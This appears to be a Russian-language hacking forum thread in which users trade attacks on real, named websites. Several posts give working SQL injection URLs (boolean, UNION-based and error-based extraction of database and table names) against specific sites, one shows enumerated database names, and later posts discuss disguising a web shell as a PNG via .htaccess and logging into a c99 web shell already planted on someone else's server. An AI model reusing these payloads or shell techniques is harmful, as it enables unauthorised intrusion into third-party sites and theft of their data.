Господа, помогите раскрутить эту скулю: http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep
вбей в гугл хеш админа... боян этот сайт ..да и интересного ничего там нет ..только как спортивный интереc
Code: http://www.xakep.ru/local/include/voter_com.asp?action=add&site=xakep&filedir=(2246941)and(substring((db_name()),1,1)='w') Code: master tempdb model msdb forum_integr files wbanner wcounter wvote www wrate zbit_net_chat catalogs test forum_gameland forum_xakep Дальше тянуть не стал.
http://www.candy.ru/detail.asp?PrId=690+and+1=0+union+all+select+null,null,null,null,null,null,null,null,null,table_name,null,null,null+from+sys.user_tables чем два дня ждать, пока кто-нибудь расскажет, хотя бы открыл мануал по ораклу и сам бы разбирался https://forum.antichat.ru/thread40576.html
а втойже папке где шелл, файлик есть ли такой .htaccess в котором должно быть прописано без этого сервер будет твой png читать как картинку а не как скрипт.
на шелл есть права на чтение/выполнение? какое расширение у шелла? исполнительные ли файлы с этим расширением в .htaccess? шелл открывается как на скрине?
залей нормальный шел https://rdot.org/forum/showthread.php?t=1085. А если шелл с расширением .php заливать он работает?
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php вот кусок кода из шелла про авторизацию $login = "2"; $pass = "2"; $md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.
как то так http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+table_name+from+information_schema.tables+limit+0,1),1,64),floor(rand(0)*2)))+and+'1
Что то вы или невнимательно меня прочли или одно из двух, я не спрашиваю какой шелл мне лучше использовать потому что залит уже этот. Я не спрашиваю какой логин мне лучше использовать мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php
Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty
Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?
$login = "2"; // ЛОГИН (С) К.О. $pass = "2"; //ПАРОЛЬ (С) К.О $md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О. Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.
Извените накипело просто ВЫ наркоманы шоле? Или вы просто посты набиваете и вам лишь бы сказать что нибудь? Я ЗНАЮ ЧТО ПАРОЛЬ 2, ЗНАЮ ЧТО ЛОГИН 2, знаю что хеш пароль 2, я сам это вписал. Я ЗНАЮ ЧТО приоритет будет у $md5_pass. Я разве спросил вас Какой у меня пароль? Я напрямую спрашиваю как вводить логин и пароль чтобы шелл принял его??? И жду ВОТ ТАКОГО ОТВЕТА: Пароль для авторизации нужно водить вот таким синтаксисом - http://site.com/faq.php?pass=c81e728d9d4c2f636f067f89cc14862c - это кстати неправильный вариант. Кто нибудь умеет авторизоваться в с99?